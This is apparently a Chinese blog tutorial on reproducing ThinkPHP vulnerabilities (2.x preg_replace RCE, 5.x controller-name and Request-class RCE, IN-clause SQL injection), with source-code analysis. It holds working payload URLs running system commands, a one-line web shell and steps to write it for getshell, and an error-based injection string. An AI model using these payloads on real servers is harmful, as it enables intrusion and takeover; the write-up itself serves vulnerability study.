這篇文章為大家?guī)砹岁P(guān)於thinkphp的相關(guān)知識(shí)，其中主要介紹了關(guān)於ThinkPHP漏洞復(fù)現(xiàn)的相關(guān)內(nèi)容，下面一起來看一下，希望對大家有幫助。

ThinkPHP

#1)簡介

ThinkPHP是一個(gè)免費(fèi)開源的，快速的，簡單的物件導(dǎo)向的國產(chǎn)輕量級(jí)PHP開發(fā)框架。

ThinkPHP遵循Apache2開源協(xié)定發(fā)布，是為了敏捷WEB應(yīng)用開發(fā)和簡化企業(yè)級(jí)應(yīng)用開而誕生的，具有免費(fèi)開源，快速簡單及面向?qū)ο竦缺姸嗟膬?yōu)秀功能和特性。 ThinkPHP經(jīng)歷了五年多發(fā)展的同時(shí)，在社區(qū)團(tuán)隊(duì)的積極參與下，在易用性，擴(kuò)展性和性能方面不斷優(yōu)化和改進(jìn)，眾多的典型案例確?？梢苑€(wěn)定用於商業(yè)以及門戶的開發(fā)。

ThinkPHP借鑒了國外許多優(yōu)秀的框架和模式，使用物件導(dǎo)向的開發(fā)結(jié)構(gòu)和MVC模式，採用單一入口模式等。融合了Struts的Action想法和JSP的TagLib（標(biāo)籤庫），ROR的ORM映射和ActiveRecord模式；封裝了CURD和一些常用操作，在專案配置，類別庫導(dǎo)入，模板引擎，查詢語言，自動(dòng)驗(yàn)證，視圖模型，專案編譯，快取機(jī)制，SEO支持，分散式資料庫，多資料庫連接和切換，認(rèn)證機(jī)制和擴(kuò)展性方面均有獨(dú)特的表現(xiàn)。

使用ThinkPHP，可以更方便快速的開發(fā)和部署應(yīng)用程式。 ThinkPHP本身俱有許多的原創(chuàng)特性，並且倡導(dǎo)大道至簡，開發(fā)由我的開發(fā)理念，用最少的代碼完成更多的功能，宗旨就是讓W(xué)EB應(yīng)用開發(fā)更簡單，更快速!

2）安裝方法

下載ThinkPHP後解壓縮完成會(huì)形成兩個(gè)資料夾：ThinkPHP和Examples。

ThinkPHP無需單獨(dú)安裝，將ThinkPHP資料夾FTP至伺服器Web目錄或拷貝至本機(jī)Web目錄下方即可。

3）ThinkPHP目錄結(jié)構(gòu)說明

#ThinkPHP.php：框架入口檔案

Common：包含框架的一些公共文件，系統(tǒng)定義，系統(tǒng)函數(shù)和慣例配置等

Conf：框架設(shè)定檔目錄

Lang：系統(tǒng)語言檔案目錄

Lib：系統(tǒng)基底類別庫目錄

Tpl：系統(tǒng)範(fàn)本目錄

Extend：框架擴(kuò)充s

#4）ThinkPHP執(zhí)行環(huán)境需求

thinkphp可以支援Windows/Unix伺服器環(huán)境，可以運(yùn)行包含Apache，IIS和nginx在內(nèi)的多種WEB伺服器和多種模式。需PHP5.2.0以上版本支持，支援MYSQL,MSSQL,PGSQL,SQLITE,ORACLE,LBASE以及PDo等多種資料庫與連線。

ThinkPHP本身沒有特別模組要求，具體的應(yīng)用系統(tǒng)運(yùn)行環(huán)境要求視開發(fā)所涉及的模組。 ThinkPHP底層運(yùn)行的記憶體消耗極低，而本身的檔案大小也是輕量級(jí)，因此不會(huì)出現(xiàn)空間和記憶體佔(zhàn)用的瓶頸。

一、2-rce

0x01 事先了解知識(shí)

preg_replace函數(shù):

preg_replace( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = - 1 [ , int &$count ]])

搜尋subject中符合pattern的部分，以replacement進(jìn)行替換。

• $pattern:要搜尋的模式，可以是字串或字串陣列

• $replacement:用來取代的字串或陣列

• $subject:用於替換的目標(biāo)字串或陣列

• $limit:可選,對於每個(gè)模式用於每個(gè)subject字串的最大可替換數(shù)。預(yù)設(shè)是-1

• $count:可選·，為替換執(zhí)行的次數(shù)

傳回值:

#如果subject為數(shù)組，則傳回?cái)?shù)組，其他情況下傳回字串。

如果匹配被查找到，替換後的subject被返回，其他情況下，返回沒有改變的subject，如果發(fā)生錯(cuò)誤返回NULL

正則表達(dá)式：https://www. runoob.com/regexp/regexp-syntax.html

0x02 實(shí)驗(yàn)步驟

造訪頁面，發(fā)現(xiàn)是一個(gè)Thinkphp的cms框架，由於是漏洞復(fù)現(xiàn)，我們很清楚的知道他的版本是2.x。如果不知道版本的可以透過亂輸入路徑進(jìn)行報(bào)錯(cuò)，或是使用雲(yún)悉指紋辨識(shí)進(jìn)行偵測

此時(shí)輸入已經(jīng)爆出的遠(yuǎn)端程式碼執(zhí)行指令即可浮現(xiàn)漏洞:

/index.php?s=/index/index/xxx/${@phpinfo()}   //phpinfo敏感文件
/index.php?s=a/b/c/${@print(eval($_POST[1]))}  //此為一句話連菜刀

這裡只要將phpinfo()換成一句話木馬即可成功!

0x03 實(shí)驗(yàn)原理

1）通過觀察這句話，我們可以清楚的知道它是將

${@phpinfo()}

作為變量輸出到了頁面顯示，其原理，我通過freebuf總結(jié)一下:

在PHP當(dāng)中， ${} 是可以構(gòu)造一個(gè)變量的， {} 寫的是一般字符，那么就會(huì)被當(dāng)作成變量，比如 ${a} 等價(jià)于 $a

thinkphp所有的主入口文件默認(rèn)訪問index控制器(模塊)

thinkphp所有的控制器默認(rèn)執(zhí)行index動(dòng)作(方法)

http://serverName/index.php（或者其它應(yīng)用入口文件）?s=/模塊/控制器/操作/[參數(shù)名/參數(shù)值...]

數(shù)組$var在路徑存在模塊和動(dòng)作時(shí)，會(huì)去除前面兩個(gè)值。而數(shù)組$var來自于explode($depr,trim($_SERVER['PATH_INFO'],'/'));也就是路徑。

所以我們構(gòu)造poc如下:

/index.php?s=a/b/c/${phpinfo()}

/index.php?s=a/b/c/${phpinfo()}/c/d/e/f

/index.php?s=a/b/c/d/e/${phpinfo()}.......

2）換而言之，就是在thinphp的類似于MVC的框架中，存在一個(gè)Dispatcher.class.php的文件，它規(guī)定了如何解析路由，在該文件中，存在一個(gè)函數(shù)為static public function dispatch()，此為URL映射控制器，是為了將URL訪問的路徑映射到該控制器下獲取資源的，而當(dāng)我們輸入的URL作為變量傳入時(shí)，該URL映射控制器會(huì)將變量以數(shù)組的方式獲取出來，從而導(dǎo)致漏洞的產(chǎn)生。

類名為`Dispatcher`，class Dispatcher extends Think
里面的方法有:
static public function dispatch() URL映射到控制器
public static function getPathInfo()  獲得服務(wù)器的PATH_INFO信息
static public function routerCheck() 路由檢測
static private function parseUrl($route)
static private function getModule($var) 獲得實(shí)際的模塊名稱
static private function getGroup($var) 獲得實(shí)際的分組名稱

二、5.0.23-rce

漏洞簡介

ThinkPHP 5.x主要分為 5.0.x和5.1.x兩個(gè)系列，系列不同，復(fù)現(xiàn)漏洞時(shí)也稍有不同。

在ThinkPHP 5.x中造成rce(遠(yuǎn)程命令執(zhí)行)有兩種原因

1.路由對于控制器名控制不嚴(yán)謹(jǐn)導(dǎo)致RCE、

2.Request類對于調(diào)用方法控制不嚴(yán)謹(jǐn)加上變量覆蓋導(dǎo)致RCE

首先記錄這兩個(gè)主要POC:

控制器名未過濾導(dǎo)致rce

function為反射調(diào)用的函數(shù)，vars[0]為傳入的回調(diào)函數(shù)，vars[1][]為參數(shù)為回調(diào)函數(shù)的參數(shù)

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

核心類Request遠(yuǎn)程代碼執(zhí)行漏洞

filter[]為回調(diào)函數(shù)，get[]或route[]或server[REQUEST_METHOD]為回調(diào)函數(shù)的參數(shù)，執(zhí)行回調(diào)函數(shù)的函數(shù)為call_user_func()

核心版需要開啟debug模式

POST /index.php？s=captch

_ method=_ construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

or

_ method=_construct&method=get&filter[]=system&get[]=pwd

控制器名未過濾導(dǎo)致RCE

0x01 簡介

2018年12月9日，ThinkPHP v5系列發(fā)布安全更新v5.0.23，修復(fù)了一處可導(dǎo)致遠(yuǎn)程代碼執(zhí)行的嚴(yán)重漏洞。在官方公布了修復(fù)記錄后，才出現(xiàn)的漏洞利用方式，不過不排除很早之前已經(jīng)有人使用了0day

該漏洞出現(xiàn)的原因在于ThinkPHP5框架底層對控制器名過濾不嚴(yán)，從而讓攻擊者可以通過url調(diào)用到ThinkPHP框架內(nèi)部的敏感函數(shù)，進(jìn)而導(dǎo)致getshell漏洞

最終確定漏洞影響版本為：

ThinkPHP 5.0.5-5.0.22

ThinkPHP 5.1.0-5.1.30

理解該漏洞的關(guān)鍵在于理解ThinkPHP5的路由處理方式主要分為有配置路由和未配置路由的情況，在未配置路由的情況，ThinkPHP5將通過下面格式進(jìn)行解析URL

http://serverName/index.php（或者其它應(yīng)用入口文件）/模塊/控制器/操作/[參數(shù)名/參數(shù)值...]

同時(shí)在兼容模式下ThinkPHP還支持以下格式解析URL：

http://serverName/index.php（或者其它應(yīng)用入口文件）?s=/模塊/控制器/操作/[參數(shù)名/參數(shù)值...]（參數(shù)以PATH_INFO傳入）
http://serverName/index.php（或者其它應(yīng)用入口文件）?s=/模塊/控制器/操作/[&參數(shù)名=參數(shù)值...]     （參數(shù)以傳統(tǒng)方式傳入）

eg:
http://tp5.com:8088/index.php?s=user/Manager/add&n=2&m=7
http://tp5.com:8088/index.php?s=user/Manager/add/n/2/m/8

本次漏洞就產(chǎn)生在未匹配到路由的情況下，使用兼容模式解析url時(shí)，通過構(gòu)造特殊url，調(diào)用意外的控制器中敏感函數(shù)，從而執(zhí)行敏感操作

下面通過代碼具體解析ThinkPHP的路由解析流程

0x02 路由處理邏輯詳細(xì)分析

分析版本: 5.0.22

跟蹤路由處理的邏輯，來完整看一下該漏洞的整體調(diào)用鏈:

thinkphp/library/think/App.php

116行，通過routeCheck()方法開始進(jìn)行url路由檢測

在routeCheck()中，首先提取$path信息，這里獲取$path的方式分別為pathinfo模式和兼容模式，pathinfo模式就是通過$_SERVER['PATH_INFO']獲取到的主要path信息，==$_SERVER['PATH_INFO']會(huì)自動(dòng)將URL中的""替換為"/",導(dǎo)致破壞命名空間格式==，==兼容模式下==$_SERVER['PATH_INFO']=$_GET[Config::get('var_pathinfo')];，path的信息會(huì)通過get的方式獲取，var_pathinfo的值默認(rèn)為's'，從而繞過了反斜杠的替換==，這里也是該漏洞的一個(gè)關(guān)鍵利用點(diǎn)

檢測邏輯：如果開啟了路由檢測模式(配置文件中的url_on為true)，則進(jìn)入路由檢測，結(jié)果返回給$result，如果路由無效且設(shè)置了只允許路由檢測模式(配置文件url_route_must為true)，則拋出異常。

在兼容模式中，檢測到路由無效后(false === $result),則還會(huì)進(jìn)入Route::parseUrl()檢測路由。我們重點(diǎn)關(guān)注這個(gè)路由解析方式，因?yàn)樵摲绞轿覀兺ㄟ^URL可控:

放回最終的路由檢測結(jié)果$result($dispath),交給exec執(zhí)行:

$dispatch = self::routeCheck($request, $config);//line:116
$data = self::exec($dispatch, $config);//line:139
public static function routeCheck($request, array $config)//line:624-658
{
        $path   = $request->path();
        $depr   = $config['pathinfo_depr'];
        $result = false;
        // 路由檢測
        $check = !is_null(self::$routeCheck) ? self::$routeCheck : $config['url_route_on'];
        if ($check) {
            // 開啟路由
            ……
            // 路由檢測（根據(jù)路由定義返回不同的URL調(diào)度）
            $result = Route::check($request, $path, $depr, $config['url_domain_deploy']);
            $must   = !is_null(self::$routeMust) ? self::$routeMust : $config['url_route_must'];
            if ($must && false === $result) {
                // 路由無效
                throw new RouteNotFoundException();
            }
        }
        // 路由無效 解析模塊/控制器/操作/參數(shù)... 支持控制器自動(dòng)搜索
        if (false === $result) {
            $result = Route::parseUrl($path, $depr, $config['controller_auto_search']);
        }
        return $result;
    }

thinkphp/libary/think/Route.php

跟蹤Route::parseUrl(),在注釋中可以看到大概解析方式

$url主要同通過parseUrlPath()解析，跟蹤該函數(shù)發(fā)現(xiàn)程序通過斜杠/來劃分模塊/控制器/操作，結(jié)果為數(shù)組形式，然后將他們封裝為$route,最終返回['type'=>'moudle','moudle'=>$route]數(shù)組，作為App.php中$dispatch1值，并傳入exec()函數(shù)中

注意這里使用的時(shí) 斜杠/來劃分每個(gè)部分，我們的控制器可以通過命名空間來調(diào)用，命名空間使用反斜杠\來劃分，正好錯(cuò)過，這也是能利用的其中一個(gè)細(xì)節(jié)

/**
     * 解析模塊的URL地址 [模塊/控制器/操作?]參數(shù)1=值1&參數(shù)2=值2...
     * @access public
     * @param string $url        URL地址
     * @param string $depr       URL分隔符
     * @param bool   $autoSearch 是否自動(dòng)深度搜索控制器
     * @return array
*/
public static function parseUrl($url, $depr = '/', $autoSearch = false)//line:1217-1276
    {
        $url              = str_replace($depr, '|', $url);
        list($path, $var) = self::parseUrlPath($url);  //解析URL的pathinfo參數(shù)和變量
        $route            = [null, null, null];
        if (isset($path)) {
            // 解析模塊，依次得到$module, $controller, $action
          ……
          // 封裝路由
            $route = [$module, $controller, $action];
        }
        return ['type' => 'module', 'module' => $route];
    }

thinkphp/library/think/Route.php

private static function parseUrlPath($url)//line:1284-1302
    {
        // 分隔符替換 確保路由定義使用統(tǒng)一的分隔符
        $url = str_replace('|', '/', $url);
        $url = trim($url, '/');
        $var = [];
        if (false !== strpos($url, '?')) {
            // [模塊/控制器/操作?]參數(shù)1=值1&參數(shù)2=值2...
            $info = parse_url($url);
            $path = explode('/', $info['path']);
            parse_str($info['query'], $var);
        } elseif (strpos($url, '/')) {
            // [模塊/控制器/操作]
            $path = explode('/', $url);
        } else {
            $path = [$url];
        }
        return [$path, $var];
    }

路由解析結(jié)果作為exec()的參數(shù)進(jìn)行執(zhí)行，追蹤該函數(shù)

thinkphp/library/think/App.php

追蹤exec()函數(shù)，傳入了$dispatch，$config兩個(gè)參數(shù)，其中$dispatch為['type' => 'module', 'module' => $route]

因?yàn)?type 為 module，直接進(jìn)入對應(yīng)流程，然后執(zhí)行module方法，其中傳入的參數(shù)$dispatch['module']為模塊\控制器\操作組成的數(shù)組

跟蹤module()方法，主要通過$dispatch['module']獲取模塊$module, 控制器$controller, 操作$action，可以看到==提取過程中除了做小寫轉(zhuǎn)換，沒有做其他過濾操作==

$controller將通過Loader::controller自動(dòng)加載，這是ThinkPHP的自動(dòng)加載機(jī)制，只用知道此步會(huì)加載我們需要的控制器代碼，如果控制器不存在會(huì)拋出異常，加載成功會(huì)返回$instance，這應(yīng)該就是控制器類的實(shí)例化對象，里面保存的有控制器的文件路徑，命名空間等信息

通過is_callable([$instance, $action])方法判斷$action是否是$instance中可調(diào)用的方法

通過判斷后，會(huì)記錄$instacne,$action到$call中（$call = [$instance, $action]），方便后續(xù)調(diào)用，并更新當(dāng)前$request對象的action

最后$call將被傳入self::invokeMethod($call, $vars)

protected static function exec($dispatch, $config)//line:445-483
    {
        switch ($dispatch['type']) {
……
            case 'module': // 模塊/控制器/操作
                $data = self::module(
                    $dispatch['module'],
                    $config,
                    isset($dispatch['convert']) ? $dispatch['convert'] : null
                );
                break;
            ……
            default:
                throw new \InvalidArgumentException('dispatch type not support');
        }
        return $data;
    }
public static function module($result, $config, $convert = null)//line:494-608
    {
        ……
        if ($config['app_multi_module']) {
            // 多模塊部署
          // 獲取模塊名
            $module    = strip_tags(strtolower($result[0] ?: $config['default_module']));
……
        }
……
        // 獲取控制器名
        $controller = strip_tags($result[1] ?: $config['default_controller']);
        $controller = $convert ? strtolower($controller) : $controller;
        // 獲取操作名
        $actionName = strip_tags($result[2] ?: $config['default_action']);
        if (!empty($config['action_convert'])) {
            $actionName = Loader::parseName($actionName, 1);
        } else {
            $actionName = $convert ? strtolower($actionName) : $actionName;
        }
        // 設(shè)置當(dāng)前請求的控制器、操作
        $request->controller(Loader::parseName($controller, 1))->action($actionName);
      ……
        try {
            $instance = Loader::controller(
                $controller,
                $config['url_controller_layer'],
                $config['controller_suffix'],
                $config['empty_controller']
            );
        } catch (ClassNotFoundException $e) {
            throw new HttpException(404, 'controller not exists:' . $e->getClass());
        }
        // 獲取當(dāng)前操作名
        $action = $actionName . $config['action_suffix'];
        $vars = [];
        if (is_callable([$instance, $action])) {
            // 執(zhí)行操作方法
            $call = [$instance, $action];
            // 嚴(yán)格獲取當(dāng)前操作方法名
            $reflect    = new \ReflectionMethod($instance, $action);
            $methodName = $reflect->getName();
            $suffix     = $config['action_suffix'];
            $actionName = $suffix ? substr($methodName, 0, -strlen($suffix)) : $methodName;
            $request->action($actionName);
        } elseif (is_callable([$instance, '_empty'])) {
            // 空操作
            $call = [$instance, '_empty'];
            $vars = [$actionName];
        } else {
            // 操作不存在
            throw new HttpException(404, 'method not exists:' . get_class($instance) . '->' . $action . '()');
        }
        Hook::listen('action_begin', $call);
        return self::invokeMethod($call, $vars);
    }

先提前看下5.0.23的修復(fù)情況，找到對應(yīng)的commit，對傳入的控制器名做了限制

thinkphp/library/think/App.php

跟蹤invokeMethod，其中 $method = $call = [$instance, $action]

通過實(shí)例化反射對象控制$instace的$action方法，即控制器類中操作方法

中間還有一個(gè)綁定參數(shù)的操作

最后利用反射執(zhí)行對應(yīng)的操作

public static function invokeMethod($method, $vars = [])
    {
        if (is_array($method)) {
            $class   = is_object($method[0]) ? $method[0] : self::invokeClass($method[0]);
            $reflect = new \ReflectionMethod($class, $method[1]);
        } else {
            // 靜態(tài)方法
            $reflect = new \ReflectionMethod($method);
        }
        $args = self::bindParams($reflect, $vars);
        self::$debug && Log::record('[ RUN ] ' . $reflect->class . '->' . $reflect->name . '[ ' . $reflect->getFileName() . ' ]', 'info');
        return $reflect->invokeArgs(isset($class) ? $class : null, $args);
    }

以上便是ThinkPHP5.0完整的路由檢測，

0x03 弱點(diǎn)利用

如上我們知道，url 路由檢測過程并沒有對輸入有過濾，我們也知道通過url構(gòu)造的模塊/控制器/操作主要來調(diào)用對應(yīng)模塊->對應(yīng)的類->對應(yīng)的方法，而這些參數(shù)通過url可控，我們便有可能操控程序中的所有控制器的代碼，接下來的任務(wù)便是尋找敏感的操作

thinkphp/library/think/App.php

public static function invokeFunction($function, $vars = [])//line:311-320
    {
        $reflect = new \ReflectionFunction($function);
        $args    = self::bindParams($reflect, $vars);
        // 記錄執(zhí)行信息
        self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');
        return $reflect->invokeArgs($args);
    }

該函數(shù)通過ReflectionFunction()反射調(diào)用程序中的函數(shù)，這就是一個(gè)很好利用的點(diǎn)，我們通過該函數(shù)可以調(diào)用系統(tǒng)中的各種敏感函數(shù)。

找到利用點(diǎn)了，現(xiàn)在就需要來構(gòu)造poc，首先觸發(fā)點(diǎn)在thinkphp/library/think/App.php中的invokeFunction，我們需要構(gòu)造url格式為模塊\控制器\操作

模塊我們用默認(rèn)模塊index即可，首先大多數(shù)網(wǎng)站都有這個(gè)模塊，而且每個(gè)模塊都會(huì)加載app.php文件，無須擔(dān)心模塊的選擇

該文件的命名空間為think，類名為app，我們的控制器便可以構(gòu)造成\think\app。因?yàn)門hinkPHP使用的自動(dòng)加載機(jī)制會(huì)識(shí)別命名空間，這么構(gòu)造是沒有問題的。

操作直接為invokeFunction，沒有疑問

參數(shù)方面，我們首先要觸發(fā)第一個(gè)調(diào)用函數(shù)，簡化一下代碼再分析一下:

第一行確定 $class 就是我們傳入的控制器\think\app實(shí)例化后的對象

第二行綁定我們的方法，也就是invokefunction

第三方就可以調(diào)用這個(gè)方法了，其中$args是我們的參數(shù)，通過url構(gòu)造，將會(huì)傳入到invokefunction中

$class   = is_object($method[0]) ? $method[0] : self::invokeClass($method[0]);
$reflect = new \ReflectionMethod($class, $method[1]);
return $reflect->invokeArgs(isset($class) ? $class : null, $args);

然后就進(jìn)入我們的invokefunctio，該函數(shù)需要什么參數(shù)，我們就構(gòu)造什么參數(shù)，首先構(gòu)造一個(gè)調(diào)用函數(shù)function=call_user_func_array

call_user_func_array需要兩個(gè)參數(shù)，第一個(gè)參數(shù)為函數(shù)名，第二個(gè)參數(shù)為數(shù)組，var[0]=system,var[1][0]=id

這里因?yàn)閮纱畏瓷湟淮位卣{(diào)調(diào)用需要好好捋一捋。。。。

復(fù)現(xiàn)成功

三.5-rce

0x01 漏洞原理

ThinkPHP是一款運(yùn)用極廣的PHP開發(fā)框架，其版本5中，由于沒有使用正確的控制器名，導(dǎo)致在網(wǎng)站沒有開啟強(qiáng)制路由的情況下(即默認(rèn)情況下)，可以執(zhí)行任意方法，從而導(dǎo)致遠(yuǎn)程命令執(zhí)行漏洞。

0x02 漏洞影響版本

ThinkPHP 5.0.5-5.0.22

ThinkPHP 5.1.0-5.1.30

0x03 漏洞復(fù)現(xiàn)

可以利用點(diǎn):

http://192.168.71.141:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

vars[0]用來接受函數(shù)名，vars[1][]用來接收參數(shù)

如:index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=%27123%27

會(huì)在屏幕上打出123和我們輸入的字符串長度

寫入一句話木馬getshell

使用file_put_contents函數(shù)寫入shell:

vars[0]=system&vars[1][]=echo%20"">>test.php

使用蟻劍成功getshell！

四.In-sqlinjection-rce

0x01 了解的知識(shí):

pdo預(yù)編譯:

當(dāng)我們使用mysql語句進(jìn)行數(shù)據(jù)查詢時(shí)，數(shù)據(jù)首先傳入計(jì)算機(jī)，計(jì)算機(jī)進(jìn)行編譯之后傳入數(shù)據(jù)庫進(jìn)行數(shù)據(jù)查詢

(我們使用的是高級(jí)語言，計(jì)算機(jī)無法直接理解執(zhí)行，所以我們將命令或請求傳入計(jì)算機(jī)時(shí)，計(jì)算機(jī)首先將我們的語句編譯成為計(jì)算機(jī)語言，之后再進(jìn)行執(zhí)行，所以如果不編譯直接執(zhí)行計(jì)算機(jī)是無法理解的，如傳入select函數(shù)，沒編譯之前計(jì)算機(jī)只認(rèn)為這是五個(gè)字符，而無法理解這是個(gè)查詢函數(shù))

如此說來，我們每次查詢時(shí)都需要先編譯，這樣會(huì)加大成本，并且會(huì)存在sql注入的可能，所以有一定危險(xiǎn)。

如此，我們進(jìn)行查詢數(shù)據(jù)庫數(shù)據(jù)時(shí)使用預(yù)編譯，例如:

select ? from security where tables=?

此語句中?代表占位符，在pdo中表示之后綁定的數(shù)據(jù)，此時(shí)無法確定具體值

用戶在傳入查詢具體數(shù)值時(shí)，計(jì)算機(jī)首先將以上的查詢語句進(jìn)行編譯，使其具有執(zhí)行力，之后再對于?代表的具體數(shù)值就不進(jìn)行編譯而直接進(jìn)行查詢，所以我們在?處利用sql注入語句代替時(shí)，就不具有任何效力，甚至傳入字符串時(shí)還會(huì)報(bào)錯(cuò)，而預(yù)編譯還可以節(jié)省成本，即上面語句除了查詢數(shù)值只編譯一次，之后進(jìn)行相同語句查詢時(shí)直接使用，只是查詢具體數(shù)值改變。所以這種預(yù)編譯的方式可以很好的防止sql注入。

漏洞上下文如下：

<?php
namespace app\index\controller;
use app\index\model\User;
class Index
{
    public function index()
    {
        $ids = input(&#39;ids/a&#39;);
        $t = new User();
        $result = $t->where(&#39;id&#39;, &#39;in&#39;, $ids)->select();
    }
}

如上述代碼，如果我們控制了in語句的值位置，即可通過傳入一個(gè)數(shù)組，來造成SQL注入漏洞。

文中已有分析，我就不多說了，但說一下為什么這是一個(gè)SQL注入漏洞。IN操作代碼如下：

<?php
...
$bindName = $bindName ?: &#39;where_&#39; . str_replace([&#39;.&#39;, &#39;-&#39;], &#39;_&#39;, $field);
if (preg_match(&#39;/\W/&#39;, $bindName)) {
    // 處理帶非單詞字符的字段名
    $bindName = md5($bindName);
}
...
} elseif (in_array($exp, [&#39;NOT IN&#39;, &#39;IN&#39;])) {
    // IN 查詢
    if ($value instanceof \Closure) {
        $whereStr .= $key . &#39; &#39; . $exp . &#39; &#39; . $this->parseClosure($value);
    } else {
        $value = is_array($value) ? $value : explode(&#39;,&#39;, $value);
        if (array_key_exists($field, $binds)) {
            $bind  = [];
            $array = [];
            foreach ($value as $k => $v) {
                if ($this->query->isBind($bindName . &#39;_in_&#39; . $k)) {
                    $bindKey = $bindName . &#39;_in_&#39; . uniqid() . &#39;_&#39; . $k;
                } else {
                    $bindKey = $bindName . &#39;_in_&#39; . $k;
                }
                $bind[$bindKey] = [$v, $bindType];
                $array[]        = &#39;:&#39; . $bindKey;
            }
            $this->query->bind($bind);
            $zone = implode(&#39;,&#39;, $array);
        } else {
            $zone = implode(&#39;,&#39;, $this->parseValue($value, $field));
        }
        $whereStr .= $key . &#39; &#39; . $exp . &#39; (&#39; . (empty($zone) ? "&#39;&#39;" : $zone) . &#39;)&#39;;
    }

可見，$bindName在前邊進(jìn)行了一次檢測，正常來說是不會(huì)出現(xiàn)漏洞的。但如果$value是一個(gè)數(shù)組的情況下，這里會(huì)遍歷$value，并將$k拼接進(jìn)$bindName。

也就是說，我們控制了預(yù)編譯SQL語句中的鍵名，也就說我們控制了預(yù)編譯的SQL語句，這理論上是一個(gè)SQL注入漏洞。那么，為什么原文中說測試SQL注入失敗呢？

這就是涉及到預(yù)編譯的執(zhí)行過程了。通常，PDO預(yù)編譯執(zhí)行過程分三步：

prepare($SQL)編譯SQL語句

bindValue($param, $value)將value綁定到param的位置上

execute()執(zhí)行

這個(gè)漏洞實(shí)際上就是控制了第二步的$param變量，這個(gè)變量如果是一個(gè)SQL語句的話，那么在第二步的時(shí)候是會(huì)拋出錯(cuò)誤的：

所以，這個(gè)錯(cuò)誤“似乎”導(dǎo)致整個(gè)過程執(zhí)行不到第三步，也就沒法進(jìn)行注入了。

但實(shí)際上，在預(yù)編譯的時(shí)候，也就是第一步即可利用。我們可以做有一個(gè)實(shí)驗(yàn)。編寫如下代碼：

<?php
$params = [
    PDO::ATTR_ERRMODE           => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES  => false,
];
$db = new PDO(&#39;mysql:dbname=cat;host=127.0.0.1;&#39;, &#39;root&#39;, &#39;root&#39;, $params);
try {
    $link = $db->prepare(&#39;SELECT * FROM table2 WHERE id in (:where_id, updatexml(0,concat(0xa,user()),0))&#39;);
} catch (\PDOException $e) {
    var_dump($e);
}

執(zhí)行發(fā)現(xiàn)，雖然我只調(diào)用了prepare函數(shù)，但原SQL語句中的報(bào)錯(cuò)已經(jīng)成功執(zhí)行：

究其原因，是因?yàn)槲疫@里設(shè)置了PDO::ATTR_EMULATE_PREPARES => false。

這個(gè)選項(xiàng)涉及到PDO的“預(yù)處理”機(jī)制：因?yàn)椴皇撬袛?shù)據(jù)庫驅(qū)動(dòng)都支持SQL預(yù)編譯，所以PDO存在“模擬預(yù)處理機(jī)制”。如果說開啟了模擬預(yù)處理，那么PDO內(nèi)部會(huì)模擬參數(shù)綁定的過程，SQL語句是在最后execute()的時(shí)候才發(fā)送給數(shù)據(jù)庫執(zhí)行；如果我這里設(shè)置了PDO::ATTR_EMULATE_PREPARES => false，那么PDO不會(huì)模擬預(yù)處理，參數(shù)化綁定的整個(gè)過程都是和Mysql交互進(jìn)行的。

非模擬預(yù)處理的情況下，參數(shù)化綁定過程分兩步：第一步是prepare階段，發(fā)送帶有占位符的sql語句到mysql服務(wù)器（parsing->resolution），第二步是多次發(fā)送占位符參數(shù)給mysql服務(wù)器進(jìn)行執(zhí)行（多次執(zhí)行optimization->execution）。

這時(shí)，假設(shè)在第一步執(zhí)行prepare($SQL)的時(shí)候我的SQL語句就出現(xiàn)錯(cuò)誤了，那么就會(huì)直接由mysql那邊拋出異常，不會(huì)再執(zhí)行第二步。我們看看ThinkPHP5的默認(rèn)配置：

...
// PDO連接參數(shù)
protected $params = [
    PDO::ATTR_CASE              => PDO::CASE_NATURAL,
    PDO::ATTR_ERRMODE           => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_ORACLE_NULLS      => PDO::NULL_NATURAL,
    PDO::ATTR_STRINGIFY_FETCHES => false,
    PDO::ATTR_EMULATE_PREPARES  => false,
];
...

可見，這里的確設(shè)置了PDO::ATTR_EMULATE_PREPARES => false。所以，終上所述，我構(gòu)造如下POC，即可利用報(bào)錯(cuò)注入，獲取user()信息：

http://localhost/thinkphp5/public/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1231

但是，如果你將user()改成一個(gè)子查詢語句，那么結(jié)果又會(huì)爆出Invalid parameter number: parameter was not defined的錯(cuò)誤。因?yàn)闆]有過多研究，說一下我猜測：預(yù)編譯的確是mysql服務(wù)端進(jìn)行的，但是預(yù)編譯的過程是不接觸數(shù)據(jù)的 ，也就是說不會(huì)從表中將真實(shí)數(shù)據(jù)取出來，所以使用子查詢的情況下不會(huì)觸發(fā)報(bào)錯(cuò)；雖然預(yù)編譯的過程不接觸數(shù)據(jù)，但類似user()這樣的數(shù)據(jù)庫函數(shù)的值還是將會(huì)編譯進(jìn)SQL語句，所以這里執(zhí)行并爆了出來。

個(gè)人總結(jié)

其實(shí)ThinkPH框架漏洞大多用到的都是設(shè)置對于控制器名的一個(gè)疏忽問題，不理解的小伙伴可以查來url調(diào)用文件的機(jī)制來學(xué)習(xí)一下，其實(shí)這些框架漏洞都是基于基礎(chǔ)漏洞的一些拓展，至于sql漏洞，了解一下pdo預(yù)編譯原理即可。

不管java或是php在進(jìn)行數(shù)據(jù)庫查詢的時(shí)候都應(yīng)該進(jìn)行pdo預(yù)編譯，我們都知道，在jdbc工作的時(shí)候分成好多步

1.建立連接

2.寫入sql語句

3.預(yù)編譯sql語句

4.設(shè)置參數(shù)

5.執(zhí)行sql獲取結(jié)果

6.遍歷結(jié)果(處理結(jié)果)

7.關(guān)閉連接

對于程序員來說，jdbc操作總是很麻煩，所以利用預(yù)編譯就是將mysql查詢語句進(jìn)行封裝，之后在進(jìn)行查詢的時(shí)候直接輸入?yún)?shù)即可，這樣即簡化了操作也極大程度加強(qiáng)了安全屬性，而以此類推，這樣來說我們是否可以將其他步驟也進(jìn)行封裝呢，也就是建立連接，寫入sql語句等，只留下寫入sql語句與遍歷結(jié)果來進(jìn)行操作，這樣就更加簡化了操作。

